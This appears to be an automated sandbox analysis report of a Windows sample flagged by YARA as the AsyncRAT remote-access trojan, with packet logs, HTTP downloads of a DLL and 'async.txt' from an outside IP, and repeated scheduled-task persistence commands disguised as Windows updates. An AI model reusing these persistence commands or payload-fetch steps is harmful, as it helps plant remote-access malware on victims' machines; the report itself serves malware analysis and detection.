                Apr 19, 2024 11:37:09.949551105 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.949552059 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.990243912 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.081551075 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081578016 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081594944 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081615925 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081633091 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081650019 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081656933 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.081681967 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081698895 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081713915 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.081716061 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081733942 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081752062 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081758976 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.081758976 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.081768036 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.081789970 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.081828117 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.081828117 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.213613987 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213628054 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213646889 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213670015 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213680029 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213697910 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213707924 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213716984 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213715076 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.213776112 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.213776112 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.213783979 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213793993 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213809967 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213819981 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213835955 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.213901043 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.213901043 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.255980968 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.345520020 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345536947 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345561981 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345571041 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345587969 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345597029 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345613003 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345622063 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345632076 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345629930 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.345693111 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.345730066 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345741034 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345757961 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.345771074 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.345838070 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.345838070 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.356380939 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.396522045 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.477511883 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477535009 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477544069 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477555037 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477565050 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477581978 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477638960 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.477663040 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477674007 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477682114 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477684021 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.477684021 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.477690935 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477699041 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.477699995 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477741003 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.477741957 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.477758884 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.477773905 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477786064 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.477850914 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.528306007 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.568358898 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.609469891 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609493971 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609503984 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609513998 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609596968 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609606028 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609606981 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.609606981 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.609622002 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609632015 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609658003 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.609658003 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.609708071 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609719038 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609734058 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609743118 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609743118 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.609752893 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.609759092 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.609783888 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.609783888 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.610223055 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.620433092 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.620459080 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.620533943 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.620533943 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.741648912 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.741688967 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.741734028 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.741756916 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.741781950 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.741797924 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.741837978 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.741934061 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.742733955 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:10.874475956 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.874547958 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:10.874900103 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:15.457453966 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:15.590060949 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:15.590194941 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:15.810542107 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:15.963562012 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:15.963599920 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:15.963671923 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:15.963700056 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:15.970418930 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:16.105680943 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:16.146516085 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:17.323731899 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:17.500818014 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:17.500890970 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:17.687899113 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:20.997813940 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:21.037179947 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:21.169116974 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:21.209019899 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:28.803694010 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:28.977322102 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:28.977464914 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:29.109941959 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:29.162190914 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:29.294071913 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:29.294970036 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:29.470350981 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:29.470479012 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:29.655620098 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:40.287910938 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:40.469060898 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:40.470551968 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:40.603035927 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:40.646682978 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:40.778497934 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:40.779390097 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:40.964478016 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:40.964574099 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:41.150871038 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:51.002846956 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:51.052886009 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:51.184612989 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:51.224730968 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:51.772248030 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:51.946657896 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:51.946872950 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:52.079395056 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:52.131056070 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:52.262984037 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:52.264395952 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:52.440677881 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:52.441459894 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:52.625598907 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:03.256407022 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:03.440495014 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:03.440617085 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:03.573107004 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:03.615443945 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:03.747292042 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:03.748004913 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:03.932555914 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:03.932657003 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:04.118591070 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:14.740915060 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:14.914581060 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:14.914767027 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:15.047327042 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:15.099936008 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:15.232233047 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:15.232872963 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:15.409097910 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:15.409281015 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:15.594820976 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:20.999608040 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:21.053149939 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:21.184984922 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:21.224988937 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:26.225434065 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:26.411840916 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:26.412051916 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:26.545783997 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:26.600035906 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:26.731885910 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:26.732918978 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:26.906742096 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:26.906852007 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:27.092233896 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:37.709867001 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:37.889214993 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:37.889313936 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:38.021748066 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:38.068907022 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:38.200604916 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:38.201697111 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:38.383384943 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:38.383502960 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:38.569108009 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.194438934 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:49.375078917 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.375312090 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:49.507760048 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.553385019 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:49.685055971 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.685733080 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:49.872148991 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:49.872221947 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:50.058661938 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:51.005683899 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:51.053340912 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:38:51.185406923 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:38:51.240892887 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:00.678719997 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:00.850824118 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:39:00.851115942 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:00.988275051 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:39:01.037935972 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:01.169905901 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:39:01.170752048 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:01.343914986 CEST880849710204.12.199.30192.168.2.7
                Apr 19, 2024 11:39:01.344054937 CEST497108808192.168.2.7204.12.199.30
                Apr 19, 2024 11:39:01.529489040 CEST880849710204.12.199.30192.168.2.7

                HTTP Request Dependency Graph

                • 204.12.199.30:20991

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.749708204.12.199.3020991180C:\Users\user\Desktop\EGSh5caf8a.exe
                TimestampBytes transferredDirectionData
                Apr 19, 2024 11:37:07.834968090 CEST86OUTGET /hatthgola.vmp.dll HTTP/1.1
                Host: 204.12.199.30:20991
                Connection: Keep-Alive
                Apr 19, 2024 11:37:07.981703997 CEST329INHTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Content-Length: 16384
                Accept-Ranges: bytes
                Server: HFS 2.3m
                Set-Cookie: HFS_SID_=0.29210929851979; path=/; HttpOnly
                ETag: B8459C44E049F7AFE6D704515E12AB08
                Last-Modified: Sun, 24 Mar 2024 02:57:23 GMT
                Content-Disposition: attachment; filename="hatthgola.vmp.dll";


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.749709204.12.199.3020991180C:\Users\user\Desktop\EGSh5caf8a.exe
                TimestampBytes transferredDirectionData
                Apr 19, 2024 11:37:08.346025944 CEST54OUTGET /async.txt HTTP/1.1
                Host: 204.12.199.30:20991
                Apr 19, 2024 11:37:08.495069027 CEST297INHTTP/1.1 200 OK
                Content-Type: text/plain
                Content-Length: 245760
                Accept-Ranges: bytes
                Server: HFS 2.3m
                Set-Cookie: HFS_SID_=0.644596335012466; path=/; HttpOnly
                ETag: 7765FE6EAB1CAD4FDE4F581EBDCEC9E6
                Last-Modified: Wed, 13 Mar 2024 13:18:06 GMT
                Content-Disposition: filename="async.txt";


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Users\user\Desktop\EGSh5caf8a.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\EGSh5caf8a.exe"
                Imagebase:0x470000
                File size:93'896 bytes
                MD5 hash:712940BAEF78C821E36B8701BF073C52
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                Reputation:low
                Has exited:true

                General

                Target ID:2
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:3
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:5
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:6
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:39 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:7
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:8
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:40 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:9
                Start time:11:37:00
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:10
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:41 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:11
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:12
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:42 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:13
                Start time:11:37:01
                Start date:19/04/2024
